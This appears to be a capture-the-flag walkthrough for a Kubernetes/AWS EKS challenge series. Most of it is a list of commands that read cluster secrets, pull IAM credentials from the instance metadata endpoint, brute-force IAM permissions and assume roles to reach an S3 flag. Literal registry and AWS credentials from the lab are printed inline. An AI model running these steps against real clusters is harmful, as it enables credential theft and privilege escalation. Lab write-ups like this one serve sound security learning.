CTF Link: https://eksclustergames.com/
Challenge 1 β Secret Seeker
kubectl whoami
kubectl auth can-i --list
kubectl get secrets
kubectl get secret log-rotate -o json
Challenge 2 β Registry Hunt
kubectl whoami
kubectl auth can-i --list
kubectl get pods
#database-pod-2c9b3a4e
kubectl get pod database-pod-2c9b3a4e -o yaml
#registry-pull-secrets-780bab1d
kubectl get secret registry-pull-secrets-780bab1d -o yaml
#eksclustergames:dckr_pat_YtncV-R85mG7m4lr45iYQj8FuCo
crane auth login docker.io -u eksclustergames -p "dckr_pat_YtncV-R85mG7m4lr45iYQj8FuCo"
crane pull docker.io/eksclustergames/base_ext_image:latest base_ext_image.tar
Extract this .tar file to get the flag.
Challenge 3 β Image Inquisition
kubectl whoami
kubectl auth can-i --list
curl 169.254.169.254/latest/meta-data/iam/security-credentials/eks-challenge-cluster-nodegroup-NodeInstanceRole
aws configure set aws_access_key_id YOUR_ACCESS_KEY
aws configure set aws_secret_access_key YOUR_SECRET_KEY
aws configure set aws_session_token YOUR_SESSION_TOKEN
Bruteforcing IAM permissions-
python3 enumerate-iam.py --access-key ASIA2AVYNEVMXO6Y46WN --secret-key B8cOWwImjKrTZLQKeZK03DXk+tqKzel9L1RUzljg --session-token FwoGZXIvYXdzEPv//////////wEaDC+QPYtuCp1i7X2JGSK3AZce7+VHqwtXmBlMY42U8rrleP8W3Rlaht6iH/eZfWSZ5ZRucxeD/zzvuD0yWNzZ33kdrXC3Js3dkYchAo+jHLzR+Q26w9YB3XvOBud9urax1MbADvWPHfOLmpW/2xIEU6WnxU6Do5ELNk/+ElHQM4go4rqUgzS/7JuQ3SgF4+S2I6t4HBfuT1idlhV+wvUnYolzi9NKGrbrdXckfczwOoi8HnNe1Cf/w24pWtxMugh0eRGA4mehLSj9xb6uBjItePUoK+Ds2Ybu5fFeGAgaU0CWk3hkvCq7tCl4eBt7Re4YjM37P/1Sqv2kaakJ
aws ecr describe-repositories --region us-west-1
aws ecr get-authorization-token --region us-west-1
docker login --username AWS -p "" 688655246681.dkr.ecr.us-west-1.amazonaws.com
aws ecr list-images --repository-name central_repo-aaf4a7c --region us-west-1
docker history 688655246681.dkr.ecr.us-west-1.amazonaws.com/central_repo-aaf4a7c:374f28d8-container --no-trunc
dive <image id>
Challenge 4 β Pod break
kubectl whoami
kubectl auth can-i --list
#No interesting permissions found
cat .kube/config
curl 169.254.169.254/latest/meta-data/iam/security-credentials/eks-challenge-cluster-nodegroup-NodeInstanceRole
aws ecr describe-repositories --region us-west-1
aws eks get-token --cluster-name localcfg
kubectl --token=$(aws eks get-token --cluster-name eks-challenge-cluster | jq '.status.token' | sed "s/\"//g") get pods
aws eks get-token --cluster-name eks-challenge-cluster
#We guessed this from get-caller-identity output
kubectl auth can-i --list --token=<>
kubectl get secrets --token=<>
kubectl get secrets -o json --token=<>
namespace: challenge4
Guessing cluster name-
Challenge 5β Container Secrets Infrastructure
Permissions
{
"secrets": [
"get",
"list"
],
"serviceaccounts": [
"get",
"list"
],
"pods": [
"get",
"list"
],
"serviceaccounts/token": [
"create"
]
}Trust Policy
{
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Principal": {
"Federated": "arn:aws:iam::688655246681:oidc-provider/oidc.eks.us-west-1.amazonaws.com/id/C062C207C8F50DE4EC24A372FF60E589"
},
"Action": "sts:AssumeRoleWithWebIdentity",
"Condition": {
"StringEquals": {
"oidc.eks.us-west-1.amazonaws.com/id/C062C207C8F50DE4EC24A372FF60E589:aud": "sts.amazonaws.com"
}
}
}
]
}IAM Policy
{
"Policy": {
"Statement": [
{
"Action": [
"s3:GetObject",
"s3:ListBucket"
],
"Effect": "Allow",
"Resource": [
"arn:aws:s3:::challenge-flag-bucket-3ff1ae2",
"arn:aws:s3:::challenge-flag-bucket-3ff1ae2/flag"
]
}
],
"Version": "2012-10-17"
}
}aws eks get-token --cluster-name eks-challenge-cluster
#Similar approach From last challenge
kubectl get sa --token=$token
kubectl get sa s3access-sa -ojson --token=$token
kubectl create token debug-sa --token=$token --audience sts.amazonaws.com
aws sts assume-role-with-web-identity --role-arn arn:aws:iam::688655246681:role/challengeEksS3Role --role-session-name s3access-sa --web-identity-token <token>
aws s3 cp s3://challenge-flag-bucket-3ff1ae2/flag ./
Thanks for reading!!
https://medium.com/@jason133337/eks-cluster-game-challenge-walkthrough-9110343c24ce
